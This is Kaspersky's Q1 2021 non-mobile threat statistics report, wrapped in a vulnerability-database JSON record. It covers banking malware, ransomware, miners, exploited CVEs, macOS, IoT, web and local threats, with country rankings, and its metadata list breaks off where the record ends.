DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year&#x27;s trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we&#x27;ve often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan&#x27;s task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "published": "2021-05-31T10:00:05", "modified": "2021-05-31T10:00:05", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "reporter": "AMR", "references": [], "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "immutableFields": [], "lastseen": "2021-05-31T11:03:47", "viewCount": 932, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB21-09"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "archlinux", "idList": ["ASA-202102-4", "ASA-202102-5", "ASA-202102-6", "ASA-202103-19"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:4BB453DC-4A7E-4FAF-832B-C5079208A3DA", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:4D8A45D9-93E7-4267-B52C-96AB82DF5A06", "AKB:5ACC27EC-B7F2-405F-B3D6-009D27A1C386", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:A85EDE41-3F67-480B-8858-46B5D866EB51", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B61D2687-96CE-4CE9-939F-9E35DA7814C4", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1095", "CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2021-0001", "CPAI-2021-0032", "CPAI-2021-0066", "CPAI-2021-0099", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0108", "CPAI-2021-0482"]}, {"type": "chrome", "idList": ["GCSA-2763659147289736801", "GCSA-3803715665928870837", "GCSA-8963246051762193641"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98", "CISA:911DE59572B6EF78B42DD868D622F637", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74"]}, {"type": "cve", "idList": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1698", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", 